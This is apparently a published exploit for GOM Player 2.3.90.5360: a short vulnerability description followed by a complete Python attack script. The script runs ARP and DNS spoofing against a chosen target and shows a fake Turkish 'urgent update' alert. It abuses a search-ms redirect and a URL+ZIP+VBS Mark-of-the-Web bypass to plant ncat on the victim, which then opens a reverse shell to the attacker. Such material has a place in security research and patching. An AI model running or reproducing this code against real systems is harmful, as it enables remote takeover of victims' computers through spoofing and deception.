GOM Player 2.3.90.5360 MITM / Remote Code Execution

# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)# Date: 26.08.2023# Author: M. Akil Gündoğan# Contact: https://twitter.com/akilgundogan# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Version: 2.3.90.5360 # Tested on: Windows 10 Pro x64 22H2 19045.3324# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.# Vulnerability Description: # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. # Full disclosure, developers should be more careful about software security.# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.# Some spaghetti and a bad code but it works :)banner = """\033[38;5;196m+-----------------------------------------------------------+|     GOM Player 2.3.90.5360 - Remote Code Execution        ||   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |+-----------------------------------------------------------+\033[0m""" +""" \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""import time,os,zipfile,subprocess,socket,sysprint(banner)if os.geteuid() != 0:    print("You need root privileges to run the exploit, please use sudo...")    sys.exit(1)targetIP = input("- Target IP address: ")listenPort = input("- Listening port for Reverse Shell: ")def fCreate(fileName,fileContent): # File create func.     f = open(fileName,"w")    f.write(fileContent)    f.close()    gw = os.popen("ip -4 route show default").read().split()s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)s.connect((gw[2], 0))ipaddr = s.getsockname()[0]gateway = gw[2]host = socket.gethostname()print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) print("\n[*]- Stage 1: Downloading neccesary tools...")smbFolderName = "GomUpdater" # change this (optional)expWorkDir = "gomExploitDir" # change this (optional)os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncatprint("    [*] - Ncat has been downloaded.")subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacketprint("    [*] - Impacket has been downloaded.")subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.pyprint("    [*] - DNSSpoof.py has been downloaded.")print("[*]- Stage 2: Creating Attacker SMB Server...")subprocess.Popen("cd " + expWorkDir + /impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.time.sleep(5) # It's necessary for exploit stability. smbIP = ipaddrspoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTPprint("[*]- Stage 3: Creating Attacker Web Page...")# change this (optional) screenExpPage = """<meta charset="utf-8"><script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';</script>"""fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)time.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")vbsCommand = '''Set shell=CreateObject("wscript.shell") Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")WScript.Sleep 5000Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)fCreate(expWorkDir + "/payload.vbs",vbsCommand)urlShortcut = '''[InternetShortcut]URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbsIDlist='''fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)time.sleep(3) # It's necessary for exploit stability. zipName = expWorkDir + "/smb-shared/archive.zip"payload_filename = os.path.join(expWorkDir, "payload.vbs")  with zipfile.ZipFile(zipName, "w") as malzip:    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))print("[*]- Stage 5: Running the attacker's web server...")subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.servertime.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...time.sleep(10) # It's neccesary for exploit stability.os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")subprocess.run("nc -lvnp " + listenPort,shell=True)subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...